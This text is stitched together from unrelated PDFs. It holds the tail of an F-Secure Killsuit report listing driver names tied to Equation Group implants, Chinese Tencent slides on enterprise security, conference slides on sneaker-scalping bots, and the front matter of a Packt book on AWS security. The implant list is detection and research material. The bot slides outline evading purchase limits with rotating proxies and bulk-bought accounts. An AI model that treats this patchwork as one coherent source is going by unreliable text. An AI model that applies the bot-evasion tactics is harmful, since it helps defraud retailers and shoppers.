• "Agilevpn","*** ST MENTAL *** -OR- RAS Agile VPN Driver"
• "amdk5","*** DARKSKYLINE MENTAL ***"
• "appinit","*** PEDDLECHEAP ***"
• "ataport32","*** SENTRYTRIBE MENTAL ***"
• "atmdkdrv","*** UNITEDRAKE ***"
• "atpmmon","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "bifsgcom","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "bootvid32","*** SENTRYTRIBE MENTAL ***"
• "cewdaenv","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "clfs32","*** SENTRYTRIBE MENTAL ***"
• "cmib113u","*** STYLISHCHAMP/OLYMPUS ***"
• "cmib129u","*** SALVAGERABBIT/OLYMPUS ***"
• "dasmkit","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "dehihdp","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "devmgr32","*** SENTRYTRIBE MENTAL ***"
• "dlapaw","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "dlcndi","*** DOORWAYNAPKIN/STOWAGEWINK ***"
• "doccfg","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "dpti30","*** DARKSKYLINE MENTAL ***"
Registry list –
Second Part
• Cache
• Cfg
• Config
• Database
• Db
• Exts
• Info
• Libs
• Logs
• Mappings
• Maps
• Mgmt
• Perf
• Settings
• Usage
Registry list –
First part
• Account
• Acct
• Adapter
• App
• Correction
• Dir
• Directory
• Driv
• Locale
• Network
• Manufacturer
• Oem
• Plugin
• Power
• User
• Shutdown
• Wh
F-Secure | Killsuit research
19
• "ds325gts","*** SALVAGERABBIT/OLYMPUS ***"
• "dump_msahci","*** MEM DUMP FOR DARKSKYLINE MENTAL ***"
• "dxg32","*** SENTRYTRIBE MENTAL ***"
• "dxghlp16","*** SENTRYTRIBE MENTAL ***"
• "DXGHLP16","*** SENTRYTRIBE MENTAL ***"
• "DXGHLP32","*** SENTRYTRIBE MENTAL ***"
• "ethip6","*** DOORMANGAUZE ***"
• "exFat","*** DARKSKYLINE MENTAL ***"
• "ext2fs32","*** SENTRYTRIBE MENTAL ***"
• "fast16","*** NOTHING TO SEE HERE - CARRY ON ***"
• "fastfat32","*** SENTRYTRIBE MENTAL ***"
• "FAT32","*** SENTRYTRIBE MENTAL ***"
• "Fdisk","*** OLYMPUS ***"
• "fld21","*** STORMTHUNDER ***"
• "FrzSys","*** Power Shadow / Shadow System ***"
• "FSPRTX","*** YAK 2 ***"
• "gdisdsk","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "Hproc","*** Angelltech Security Policy Management (SPM) ***"
• "hrlib","*** UNITEDRAKE ***"
• "hwinfo","*** *** InfoTeCS ViPNet *** ***"
• "inetcom32","*** LOCUSTTHREAT/UNITEDRAKE ***"
• "ip4fw","*** DARKSKYLINE MENTAL ***"
• "IPLIR","*** InfoTeCS ViPNet ***"
• "IPNPF","*** InfoTeCS ViPNet ***"
• "iqvwx86","*** DARKSKYLINE MENTAL ***"
• "irda32","*** DARKSKYLINE MENTAL ***"
• "irtidvc","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "itcscrpt","*** InfoTeCS ViPNet ***"
• "itcsids","*** InfoTeCS ViPNet ***"
• "itcspe","*** InfoTeCS ViPNet ***"
• "itcsprot","*** InfoTeCS ViPNet ***"
• "itcsrf","*** InfoTeCS ViPNet ***"
• "itcswd","*** InfoTeCS ViPNet ***"
• "jsdw776","*** MANTLESTUMP/UNITEDRAKE ***"
• "kbdclmgr","*** SALVAGERABBIT/UNITEDRAKE ***"
• "kbpnp","*** YAK ***"
• "khlp755w","*** STOWAGEWINK/UNITEDRAKE ***"
• "khlp807w","*** NETSPYDER ***"
• "khlp811u","*** SPINOFFCACTUS/OLYMPUS ***"
• "khlp894u","*** SCOUTRUMMAGE/UNITEDRAKE ***"
• "lhepfi","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "mdnwdiag","*** BEHAVEPEKING ***"
• "mf32","*** CARBONFIBER ***"
• "mipllst","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "mpdkg32","*** KILLSUIT ***"
• "mq32","*** CARBONFIBER ***"
• "msahci","*** DARKSKYLINE MENTAL ***"
• "mscnsp","*** FORMALRITE/UNITEDRAKE ***"
• "mscoreep","*** FOGGYBOTTOM/UNITEDRAKE ***"
• "msdtcs32","*** SPITTINGSPYDER/UNITEDRAKE ***"
• "mskbd","*** ELLIOTSPRINGE/FLEWAVENUE ***"
• "msmps32","*** HASSLEWITTPORT/UNITEDRAKE ***"
• "MSNDSRV","*** UNITEDRAKE 3.4 ***"
• "msndsrv","*** UNITEDRAKE 3.4 ***"
• "msrmdr32","*** STOWAGEWINK/UNITEDRAKE ***"
F-Secure | Killsuit research
20
• "msrstd","*** SALVAGERABBIT ***"
• "msrtvd","*** GROK/UNITEDRAKE ***"
• "msrtvid32","*** SPINOFFCACUS/UNITEDRAKE ***"
• "msscd16","*** VALIDATOR ***"
• "mstcp32","*** SENTRYTRIBE ***"
• "mstkpr","*** SALVAGERABBIT/UNITEDRAKE ***"
• "msvcp56","*** PEDDLECHEAP ***"
• "msvcp57","*** PEDDLECHEAP ***"
• "msvcp58","*** PEDDLECHEAP ***"
• "ndis5mgr","*** FULLMOON ***"
• "nethdlr","*** MISTYVEAL ***"
• "netio","*** ST MENTAL *** -OR- NETIO Legacy TDI Support Driver"
• "NETIO","*** ST MENTAL *** -OR- NETIO Legacy TDI Support Driver"
• "netmst","*** SCOUTRUMMAGE/UNITEDRAKE ***"
• "nls_295w","*** SCOUTRUMMAGE/UNITEDRAKE ***"
• "nls_470u","*** SCOUTRUMMAGE/UNITEDRAKE ***"
• "nls_875u","*** SUPERFLEX/OLYMPUS ***"
• "nls_879u","*** SMOGSTRUCK/OLYMPUS ***"
• "nls_895u","*** SHADOWFLEX/OLYMPUS ***"
• "ntevt","*** FLEWAVENUE ***"
• "ntevt32","*** FLEWAVENUE (TEMP) ***"
• "nwlfi","*** DARKSKYLINE MENTAL ***"
• "olok_2k","*** KILLSUIT LOADER DRIVE - REMOVE ME ***"
• "oplemflt","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "otpemod","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "pdresy","*** DRAFTYPLAN ***"
• "perfnw","*** DOORMANGAUZE ***"
• "plugproc","*** SCOUTRUMMAGE/UNITEDRAKE ***"
• "pnpscsi","*** CARBONFIBER ***"
• "prsecmon","*** UTILITYBURST ***"
• "psecmon","*** UTILITYBURST ***"
• "pssdk31","*** microOLAP Packet Sniffer SDK Driver ***"
• "pssdk40","*** microOLAP Packet Sniffer SDK Driver ***"
• "pssdk41","*** microOLAP Packet Sniffer SDK Driver ***"
• "pssdk42","*** microOLAP Packet Sniffer SDK Driver ***"
• "pssdklbf","*** microOLAP Packet Sniffer SDK Driver ***"
• "psxssdll","*** PEDDLECHEAP ***"
• "rasapp","*** FOGGYBOTTOM/UNITEDRAKE ***"
• "rasl2tcp","*** DARKSKYLINE MENTAL ***"
• "rdpvrf","*** DOLDRUMWRAPUP ***"
• "risfclt","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "rls1201","*** FINALDUET/UNITEDRAKE ***"
• "ropdir","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "scsi2mgr","*** SALVAGERABBIT/OLYMPUS ***"
• "segfib","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "serstat","*** DRILLERSKYLINE ***"
• "shlgina","*** DEMENTIAWHEEL TASKING ***"
• "storvsc","*** DARKSKYLINE MENTAL ***"
• "symc81x","*** DARKSKYLINE MENTAL ***"
• "tapindis","*** JEALOUSFRUIT ***"
• "tcphoc","*** Thunder Networking BHO/Download Manager/Adware ***"
• "tdip","*** DARKSKYLINE ***"
• "tnesahs","*** KILLSUIT LAUNCHER DRIVER - REMOVE ME ***"
• "viac7","*** SENTRYTRIBE MENTAL ***"
• "vmm32","*** DARKSKYLINE MENTAL ***"
F-Secure | Killsuit research
21
• "volrec","*** SALVAGERABBIT ***"
• "vregstr","*** VALIDATOR ***"
• "wanarpx86","*** DARKSKYLINE MENTAL ***"
• "wceusbsh32","*** SENTRYTRIBE MENTAL ***"
• "wdmaud32","*** SENTRYTRIBE MENTAL ***"
• "wimmount","*** SENTRYTRIBE MENTAL ***"
• "wmpvmux9","*** STOWAGEWINK/UNITEDRAKE ***"
• "wpl913h","*** GROK/UNITEDRAKE ***"
• "ws2ufsl","*** DARKSKYLINE MENTAL ***"
• "wship","*** PEDDLECHEAP 2.0 ***"
• "xpinet30","*** FOGGYBOTTOM ***"
F-Secure | Killsuit research
22
SOURCES
https://www.cs.bu.edu/~goldbe/teaching/HW55815/presos/eqngroup.pdf
https://www.youtube.com/watch?v=R5mgAsd2VBM
https://github.com/misterch0c/shadowbroker/
http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-17-killsuit-the-equation-
groups-swiss-army-knife-for-persistence-evasion-and-data-exfil-francisco-donoso
Nobody has better visibility into real-life cyber attacks than
F-Secure. We’re closing the gap between detection and response,
utilizing the unmatched threat intelligence of hundreds of our
industry’s best technical consultants, millions of devices running
our award-winning software, and ceaseless innovations in
artificial intelligence. Top banks, airlines, and enterprises trust our
commitment to beating the world’s most potent threats.
Together with our network of the top channel partners and over
200 service providers, we’re on a mission to make sure everyone
has the enterprise-grade cyber security we all need. Founded in
1988, F-Secure is listed on the NASDAQ OMX Helsinki Ltd.
f-secure.com | twitter.com/fsecure | linkedin.com/ f-secure | pdf |
企业安全技术体系建设与实践
关于我
胡珀 , lake2
□ 2007年加入腾讯安全平台部
□ 腾讯T4安全专家,目前负责应用运维安全
□ Web漏洞扫描器、恶意网址检测系统、主机安全Agent建设和运营
□ 安全事件响应、渗透测试、安全培训、安全评估、安全规范
□ 腾讯安全应急响应中心(TSRC)与威胁情报奖励计划
□ 移动安全 & 智能设备安全
关于腾讯
互联网之王,囊括几乎所有的互联网业务模式,安全上是巨大挑战
安全的三个阶段
救火队 -> 全面保障业务发展 -> 业务的核心竞争力
安全生命周期(SDL)
谷歌基础设施安全
学习谷歌先进经验
DDoS攻击防护
全国分布式防护
近源清洗 – 与云堤合作/终端预研中
最大防护流量 600+Gbps
常见DDoS攻击
10000+ 次攻击每月
响应时间小于10s
For 腾讯云·大禹/知道创宇
Anti-APT:生产环境安全
缩小攻击面:高危端口管控
划区治理:按业务隔离
纵深防御:入侵行为全过程检测
基线模型:异常检测(UEBA)
终端防御:主机安全Agent
网络防御:流量分析
Anti-APT:办公环境安全
缩小攻击面:HTTP代理上网
划区治理:按网隔离
终端防御:PC/Mobile Agent
基线模型:异常检测
网络防御:流量分析
不要忘了BYOD和办公WiFi !
数据安全
安全漏洞收敛:终端漏洞
支持PC(Win/Mac)、Mobile(iOS/Android)
静态 + 动态
安全漏洞收敛:服务端漏洞
自研爬虫
插件式
7*24h
红蓝军对抗
模拟黑客从攻击者视角对业务进行渗透,检验安全防护能力
数据分析
漏洞奖励计划
众包众测,发现漏洞,检验安全防护能力
AI应用与对抗 | pdf |
Scripting #SWAG
RISE OF
THE
HYPEBOTS
Duct
Couldn’t buy anything due to bots
Decided to enter the game in 2012
Unfortunately still in the game.
Looks good tho?
About Me
Why Bots?
We Built the Internet
For Them.
The Bots We Loved
1988
1994
1999
2007
First Internet Bot spotted on IRC
AOL Releases WebCrawler
IRC’s first Malicious Botnet
First “large scale” HTTP botnet
Our (best) Internet
[SEO] Google is not the only bot anymore.
[HTML]“Readable” and Clean HTML is easy to
parse
[APIs] Speedy and Reliable
[Capitalism] Purchasing should be easy.
Test Driven Development
1. If you’re writing tests, you’re one evil
genius moment away from becoming a bot
reseller
2. If your site is using unit tests, you’re
making sure that your site will be easy to
bot.
CAPITALISM
ENCOURAGES
BAD BEHAVIOR
Why We Bot
Restricted supply increases demand for a heavily
marketed product
Speed run checkout system creates a problem that
requires an optimal solution
Optimal Solution: Computers using computers.
Why “They” Bot
Restricted supply increases demand for a heavily
marketed product
Buyers market allows for space for a “grey market”
to emerge to resell product.
Need a vast amount of restricted product for more
profit
Optimal Solution: Many computers using computers
How Bots?
Complex Systems
Simple Answers
Types of Bots
Browser Based Bot
‣ Mimics a user by loading a
browser
‣ Easier to script, and
harder to detect
‣ More expensive to scale
Low Level Bot
‣ Uses API calls to post
directly.
‣ Takes more initial
upfront investment
‣ Scale to thousands
easily.
Meet the Team!
Monitor-Bot
B
Account-Bot
C
Buy-Bot
D
Sell-Bot
I
WRITE A TEST
MAKE IT WORK
simple_bot.avi
A-B-C. A-ALWAYS, B-BE, C-CHECKING.
ALWAYS BE CHECKING!
SIMPLE MONITOR
simple_monitor.avi goes here
MAKE IT BETTER
MAKE IT BETTER
MAKE IT BETTER
MAKE IT BETTER
MAKE IT BETTER
Run all those requests through a proxy
rotating proxy.
Post the monitor results to a chat
Sell access to that chat for $$$
MONITOR FOR PROFIT
monitor_bot.avi
complicated_bot.avi
MAKE IT BETTER
MAKE IT BETTER
MAKE IT BETTER
MAKE IT BETTER
MAKE IT BETTER
Monitor multiple sites, strike many
outlets, not just one.
Purchase “verified” accounts in bulk.
If it can be a variable, it should be.
Cluster deploys increase chances.
The Economist
Making a profit
from hypebeasts
IF THERES
A MARKET
THERE’S A PROFIT
Our (own) Economy
Account Economy - verified accounts come in packs of
500-10,000 run out of China
Cook Groups - buy friends who always seem to have
the information, the right configs, the right stack
overflow links, and a monitoring bot.
Purchasing Scripts - Prettily wrapped request with a
fancy GUI
Investment Opportunities!
D
Buy-Bot
Fun, flirty, and $1500
Can resell for profit to
redditors
Does it all!
Dedicated support
network
Fancy UI made with
Twitter Bootstrap!
Monitor-Bot
Subscriptions start at
$15
Comes 3 real friends
Compatible with Buy-Bot
Dedicated support
network
Stack overflow links
provided
B
RESELLERS
DO
RESELLING
BEST
BOT BOTS
bot_bot.avi
Future Bot
And why we need to get
L0L totally rand0m
We Care about (your) money.
Resellers are not good consumers, often make more profit
than the company does.
Resellers crowding drops means that real consumers stop
purchasing.
Human’s perceive “fairness” and if a company isn’t fair, then
why give them money?
Blacklisting?
Bot Traffic Mimicks human traffic, so you’ll end up
blacklisting consumers
Accounts are purchased and dumped regularly
Since bots are deployed in clusters and behind proxies, IPs
will change each purchase (or each request)
Blacklisting means creating a useless database.
MAKE IT WORSE
MAKE IT WORSE
MAKE IT WORSE
MAKE IT WORSE
MAKE IT WORSE
False Listings confuse bots and
consumers
In person sales just mean in person
resellers
Lottery based means bots buy lotto
tickets instead
Making the Web
Unpredictable Again
‣ Adding entropy into your system does not mean introducing
unreliability
‣ Measured unpredictability can make many tasks more
difficult
‣ Let’s encrypt our process, not just our passwords.
THIS AIN’T
A SCENE
IT’S AN
ARMS RACE | pdf |
Mastering AWS Security
Create and maintain a secure cloud ecosystem
Albert Anthony
BIRMINGHAM - MUMBAI
Mastering AWS Security
Copyright © 2017 Packt Publishing
All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or
transmitted in any form or by any means, without the prior written permission of the
publisher, except in the case of brief quotations embedded in critical articles or reviews.
Every effort has been made in the preparation of this book to ensure the accuracy of the
information presented. However, the information contained in this book is sold without
warranty, either express or implied. Neither the author, nor Packt Publishing, and its
dealers and distributors will be held liable for any damages caused or alleged to be caused
directly or indirectly by this book.
Packt Publishing has endeavored to provide trademark information about all of the
companies and products mentioned in this book by the appropriate use of capitals.
However, Packt Publishing cannot guarantee the accuracy of this information.
First published: October 2017
Production reference: 1251017
Published by Packt Publishing Ltd.
Livery Place
35 Livery Street
Birmingham
B3 2PB, UK.
ISBN 978-1-78829-372-3
www.packtpub.com
Credits
Author
Albert Anthony
Copy Editors
Juliana Nair
Stuti Srivastava
Reviewers
Adrin Mukherjee
Satyajit Das
Project Coordinator
Judie Jose
Commissioning Editor
Vijin Boricha
Proofreader
Safis Editing
Acquisition Editor
Heramb Bhavsar
Indexer
Tejal Daruwale Soni
Content Development Editor
Devika Battike
Graphics
Kirk D'Penha
Technical Editor
Prachi Sawant
Production Coordinator
Melwyn Dsa
About the Author
Albert Anthony is a seasoned IT professional with 18 years of experience working with
various technologies and in multiple teams spread all across the globe. He believes that the
primary purpose of information technology is to solve problems faced by businesses and
organizations. He is an AWS certified solutions architect and a corporate trainer. He holds
all three AWS associate-level certifications along with PMI-PMP and Certified Scrum
Master certifications. He has been training since 2008 on project management, cost
management, and people management, and on AWS since 2016.
He has managed multiple projects on AWS that runs big data applications, hybrid mobile
application development, DevOps, and infrastructure monitoring on AWS. He has
successfully migrated multiple workloads to AWS from on-premise data centers and other
hosting providers. He is responsible for securing workloads for all his customers, with
hundreds of servers; processing TBs of data; and running multiple web, mobile, and batch
applications. As well as this, he and his team has saved their customers millions of dollars
by optimizing usage of their AWS resources and following AWS best practices.
Albert has worked with organizations of all shapes and sizes in India, the USA, and the
Middle East. He has worked with government organizations, non-profit organizations,
banks and financial institutions, and others to deliver transformational projects. He has
worked as a programmer, system analyst, project manager, and senior engineering manager
throughout his career. He is the founder of a cloud training and consulting startup,
LovesCloud, in New Delhi, India.
I want to thank the staff at Packt Publishing, namely Heramb, Devika, and Prachi, for
giving me the opportunity to author this book and helping me over the past few months to
bring this book to life.
About the Reviewers
Adrin Mukherjee, solution architect for Wipro Limited, is a core member of the
engineering team that drives Wipro's Connected Cars Platform. He has thirteen years of IT
experience and has had several challenging roles as a technical architect, building
distributed applications, and high performance systems.
He loves to spend his personal time with his family and his best friend Choco, a Labrador
Retriever.
Satyajit Das has more than seventeen years of industry experience including around four
years of experience in AWS and Google cloud. He helped internal and external customers
for defining architecture of applications to be hosted in cloud. He has defined migration
factory and led teams for application migration. He has used Enterprise architecture
framework to define application, data and infrastructure architecture and migrate solutions
to AWS cloud. He architected, designed and implemented high available, scalable and fault
tolerant applications using Micro-Service architecture paradigm and used cloud native
architecture in AWS. He has also been involved with cloud CoE, governance setup, defining
best practices, policies and guidelines for service implementations. He has lead large teams
for solution delivery and execution. He has experience across industry domains like
manufacturing, finance, consulting, and government.
Satyajit has worked in leading organizations such as Wipro, Infosys, PwC and Accenture in
various challenging roles.
Satyajit has co-authored AWS Networking Cookbook
I’ll like to thank my entire family specially my wife Papiya for supporting me in all ups and
downs.
www.PacktPub.com
For support files and downloads related to your book, please visit www.PacktPub.com.
Did you know that Packt offers eBook versions of every book published, with PDF and
ePub files available? You can upgrade to the eBook version at www.PacktPub.com and as a
print book customer, you are entitled to a discount on the eBook copy. Get in touch with us
at [email protected] for more details.
At www.PacktPub.com, you can also read a collection of free technical articles, sign up for a
range of free newsletters and receive exclusive discounts and offers on Packt books and
eBooks.
https://www.packtpub.com/mapt
Get the most in-demand software skills with Mapt. Mapt gives you full access to all Packt
books and video courses, as well as industry-leading tools to help you plan your personal
development and advance your career.
why subscribe
Fully searchable across every book published by Packt
Copy and paste, print, and bookmark content
On demand and accessible via a web browser
Customer Feedback
Thanks for purchasing this Packt book. At Packt, quality is at the heart of our editorial
process. To help us improve, please leave us an honest review on this book's Amazon page
at https://www.amazon.com/dp/178829372X.
If you'd like to join our team of regular reviewers, you can e-mail us at
[email protected]. We award our regular reviewers with free eBooks and
videos in exchange for their valuable feedback. Help us be relentless in improving our
products!
Table of Contents
Preface
1
Chapter 1: Overview of Security in AWS
6
Chapter overview
7
AWS shared security responsibility model
7
Shared responsibility model for infrastructure services
10
Shared responsibility model for container services
13
Shared responsibility model for abstracted services
14
AWS Security responsibilities
15
Physical and environmental security
16
Storage device decommissioning
17
Business continuity management
17
Communication
18
Network security
20
Secure network architecture
20
Secure access points
20
Transmission protection
20
Network monitoring and protection
21
AWS access
21
Credentials policy
21
Customer security responsibilities
22
AWS account security features
25
AWS account
25
AWS credentials
26
Individual user accounts
27
Secure HTTPS access points
27
Security logs
27
AWS Trusted Advisor security checks
28
AWS Config security checks
29
AWS Security services
30
AWS Identity and Access Management
31
AWS Virtual Private Cloud
31
AWS Key Management System (KMS)
31
AWS Shield
32
AWS Web Application Firewall (WAF)
32
AWS CloudTrail
32
[ ii ]
AWS CloudWatch
32
AWS Config
33
AWS Artifact
33
Penetration testing
33
AWS Security resources
33
AWS documentation
34
AWS whitepapers
34
AWS case studies
34
AWS YouTube channel
34
AWS blogs
35
AWS Partner Network
35
AWS Marketplace
35
Summary
35
Chapter 2: AWS Identity and Access Management
37
Chapter overview
38
IAM features and tools
39
Security
39
AWS account shared access
39
Granular permissions
40
Identity Federation
40
Temporary credentials
40
AWS Management Console
41
AWS command line tools
42
AWS SDKs
42
IAM HTTPS API
42
IAM Authentication
42
IAM user
43
IAM groups
46
IAM roles
48
AWS service role
49
AWS SAML role
50
Role for cross-account access
51
Role for Web Identity Provider
52
Identity Provider and Federation
53
Delegation
54
Temporary security credentials
54
AWS Security Token Service
55
The account root user
56
IAM Authorization
57
Permissions
57
[ iii ]
Policy
59
Statement
60
Effect
61
Principal
61
Action
61
Resource
62
Condition
62
Creating a new policy
63
IAM Policy Simulator
64
IAM Policy Validator
65
Access Advisor
66
Passwords Policy
66
AWS credentials
67
IAM limitations
69
IAM best practices
70
Summary
73
Chapter 3: AWS Virtual Private Cloud
74
Chapter overview
75
VPC components
76
Subnets
77
Elastic Network Interfaces (ENI)
77
Route tables
78
Internet Gateway
78
Elastic IP addresses
79
VPC endpoints
79
Network Address Translation (NAT)
80
VPC peering
81
VPC features and benefits
81
Multiple connectivity options
82
Secure
82
Simple
83
VPC use cases
83
Hosting a public facing website
84
Hosting multi-tier web application
84
Creating branch office and business unit networks
86
Hosting web applications in the AWS Cloud that are connected with your
data center
87
Extending corporate network in AWS Cloud
87
Disaster recovery
88
VPC security
89
[ iv ]
Security groups
89
Network access control list
91
VPC flow logs
92
VPC access control
93
Creating VPC
94
VPC connectivity options
96
Connecting user network to AWS VPC
96
Connecting AWS VPC with other AWS VPC
98
Connecting internal user with AWS VPC
100
VPC limits
100
VPC best practices
101
Plan your VPC before you create it
101
Choose the highest CIDR block
102
Unique IP address range
102
Leave the default VPC alone
102
Design for region expansion
103
Tier your subnets
103
Follow the least privilege principle
103
Keep most resources in the private subnet
103
Creating VPCs for different use cases
104
Favor security groups over NACLs
104
IAM your VPC
104
Using VPC peering
105
Using Elastic IP instead of public IP
105
Tagging in VPC
105
Monitoring a VPC
106
Summary
106
Chapter 4: Data Security in AWS
108
Chapter overview
109
Encryption and decryption fundamentals
110
Envelope encryption
112
Securing data at rest
113
Amazon S3
113
Permissions
113
Versioning
113
Replication
114
Server-Side encryption
114
Client-Side encryption
114
Amazon EBS
114
Replication
114
Backup
115
[ v ]
Encryption
115
Amazon RDS
115
Amazon Glacier
116
Amazon DynamoDB
116
Amazon EMR
116
Securing data in transit
116
Amazon S3
117
Amazon RDS
117
Amazon DynamoDB
118
Amazon EMR
118
AWS KMS
118
KMS benefits
119
Fully managed
119
Centralized Key Management
119
Integration with AWS services
119
Secure and compliant
119
KMS components
120
Customer master key (CMK)
120
Data keys
120
Key policies
120
Auditing CMK usage
121
Key Management Infrastructure (KMI)
121
AWS CloudHSM
121
CloudHSM features
122
Generate and use encryption keys using HSMs
122
Pay as you go model
122
Easy To manage
122
AWS CloudHSM use cases
123
Offload SSL/TLS processing for web servers
123
Protect private keys for an issuing certificate authority
124
Enable transparent data encryption for Oracle databases
124
Amazon Macie
124
Data discovery and classification
124
Data security
125
Summary
125
Chapter 5: Securing Servers in AWS
127
EC2 Security best practices
129
EC2 Security
130
IAM roles for EC2 instances
131
Managing OS-level access to Amazon EC2 instances
132
Protecting your instance from malware
133
Secure your infrastructure
134
[ vi ]
Intrusion Detection and Prevention Systems
136
Elastic Load Balancing Security
137
Building Threat Protection Layers
137
Testing security
139
Amazon Inspector
140
Amazon Inspector features and benefits
141
Amazon Inspector components
143
AWS Shield
146
AWS Shield benefits
148
AWS Shield features
148
AWS Shield Standard
149
AWS Shield Advanced
149
Summary
150
Chapter 6: Securing Applications in AWS
151
AWS Web Application Firewall (WAF)
152
Benefits of AWS WAF
153
Working with AWS WAF
154
Signing AWS API requests
157
Amazon Cognito
158
Amazon API Gateway
159
Summary
160
Chapter 7: Monitoring in AWS
161
AWS CloudWatch
163
Features and benefits
164
AWS CloudWatch components
167
Metrics
167
Dashboards
169
Events
171
Alarms
172
Log Monitoring
174
Monitoring Amazon EC2
176
Automated monitoring tools
176
Manual monitoring tools
180
Best practices for monitoring EC2 instances
181
Summary
182
Chapter 8: Logging and Auditing in AWS
183
Logging in AWS
185
AWS native security logging capabilities
186
Best practices
187
[ vii ]
AWS CloudTrail
187
AWS Config
187
AWS detailed billing reports
188
Amazon S3 Access Logs
188
ELB Logs
189
Amazon CloudFront Access Logs
190
Amazon RDS Logs
190
Amazon VPC Flow Logs
191
AWS CloudWatch Logs
192
CloudWatch Logs concepts
192
CloudWatch Logs limits
194
Lifecycle of CloudWatch Logs
195
AWS CloudTrail
197
AWS CloudTrail concepts
198
AWS CloudTrail benefits
199
AWS CloudTrail use cases
200
Security at Scale with AWS Logging
203
AWS CloudTrail best practices
204
Auditing in AWS
205
AWS Artifact
206
AWS Config
207
AWS Config use cases
208
AWS Trusted Advisor
209
AWS Service Catalog
210
AWS Security Audit Checklist
211
Summary
212
Chapter 9: AWS Security Best Practices
213
Shared security responsibility model
216
IAM security best practices
216
VPC
217
Data security
218
Security of servers
219
Application security
220
Monitoring, logging, and auditing
221
AWS CAF
222
Security perspective
223
Directive component
223
Preventive component
223
Detective component
224
Responsive component
224
Summary
224
[ viii ]
Index
225
Preface
Security in information technology is considered a nerdy or geeky topic, reserved for
technologists who know about the nitty-gritty of networks, packets, algorithms, and so on
for years. With organizations moving their workloads, applications, and infrastructure to
the cloud at an unprecedented pace, security of all these resources has been a paradigm
shift for all those who are responsible for security; experts, novices, and apprentices alike.
AWS provides many controls to secure customer workloads and quite often customers are
not aware of their share of security responsibilities, and the security controls that they need
to own and put in place for their resources in the AWS cloud. This book aims to resolve this
problem by providing detailed information, in easy-to-understand language, supported by
real-life examples, figures, and screenshots, for all you need to know about security in
AWS, without being a geek or a nerd and without having years of experience in the security
domain!
This book tells you how you can enable continuous security, continuous auditing, and
continuous compliance by automating your security in AWS; with tools, services, and
features provided by AWS. By the end of this book, you will understand the complete
landscape of security in AWS, covering all aspects of end-to-end software and hardware
security along with logging, auditing, and the compliance of your entire IT environment in
the AWS cloud. Use the best practices mentioned in this book to master security in your
AWS environment.
What this book covers
Chapter 1, Overview of Security in AWS, introduces you to the shared security responsibility
model, a fundamental concept to understand security in AWS. As well as this, it introduces
you to the security landscape in AWS.
Chapter 2, AWS Identity and Access Management, walks you through the doorway of all
things about security in AWS, access control, and user management. We learn about
identities and authorizations for everything in AWS in great detail in this chapter.
Chapter 3, AWS Virtual Private Cloud, talks about creating and securing our own virtual
network in the AWS cloud. This chapter also introduces you to the various connectivity
options that AWS provides to create hybrid cloud, public cloud, and private cloud
solutions.
Preface
[ 2 ]
Chapter 4, Data Security in AWS, talks about encryption in AWS to secure your data in rest
and while working with AWS data storage services.
Chapter 5, Securing Servers in AWS, explains ways to secure your infrastructure in AWS by
employing continuous threat assessment, agent-based security checks, virtual firewalls for
your servers, and so on.
Chapter 6, Securing Applications in AWS, introduces you to ways to secure all your
applications developed and deployed in the AWS environment. This chapter walks you
through the web application firewall service, as well as securing a couple of AWS services
used by developers for web and mobile application development.
Chapter 7, Monitoring in AWS, provides a deep dive into the monitoring of your resources
in AWS, including AWS services, resources, and applications running on the AWS cloud.
This chapter helps you to set up monitoring for your native AWS resources along with your
custom applications and resources.
Chapter 8, Logging and Auditing in AWS, helps you to learn ways to stay compliant in the
AWS cloud by logging and auditing all that is going on with your AWS resources. This
chapter gives you a comprehensive, hands-on tour of logging and auditing all the services
to achieve continuous compliance for your AWS environment.
Chapter 9, AWS Security Best Practices, walks you through best practices in a consolidated
form for securing all your resources in AWS. Ensure that these best practices are followed
for all your AWS environments!
What you need for this book
You will need to sign up for the AWS Free Tier account available at https://aws.amazon.
com/free/ for this book. That is all you need, an AWS Free Tier account and the basic
understanding of AWS foundation services, such as AWS Simple Storage Service, Amazon
Elastic Compute Cloud, and so on.
Who this book is for
This book is for all IT professionals, system administrators, security analysts, and chief
information security officers who are responsible for securing workloads in AWS for their
organizations. It is helpful for all solutions architects who want to design and implement
secure architecture on AWS by following the security by design principle. This book is
helpful for people in auditing and project management roles to understand how they can
audit AWS workloads and how they can manage security in AWS respectively.
Preface
[ 3 ]
If you are learning AWS or championing AWS adoption in your organization, you should
read this book to build security into all your workloads. You will benefit from knowing
about the security footprint of all major AWS services for multiple domains, use cases, and
scenarios.
Conventions
In this book, you will find a number of styles of text that distinguish between different
kinds of information. Here are some examples of these styles, and an explanation of their
meaning.
Code words in text, database table names, folder names, filenames, file extensions,
pathnames, dummy URLs, user input, and Twitter handles are shown as follows: "Amazon
EC2 key pair that is stored within AWS is appended to the initial operating system
user’s ~/.ssh/authorized_keys file".
A block of code is as follows:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "ec2:Describe*",
"Resource": "*"
}
]
}
New terms and important words are shown in bold. Words that you see on the screen, in
menus or dialog boxes for example, appear in the text like this: "Statistic chosen
is Average and the period is 5 Minutes:"
Warnings or important notes appear like this
Tips and tricks appear like this.
Preface
[ 4 ]
Readers feedback
Feedback from our readers is always welcome. Let us know what you think about this
book-what you liked or disliked. Reader feedback is important for us as it helps us develop
titles that you will really get the most out of.
To send us general feedback, simply email [email protected], and mention the
book's title in the subject of your message.
If there is a topic that you have expertise in and you are interested in either writing or
contributing to a book, see our author guide at www.packtpub.com/authors.
Customer support
Now that you are the proud owner of a Packt book, we have a number of things to help you
to get the most from your purchase.
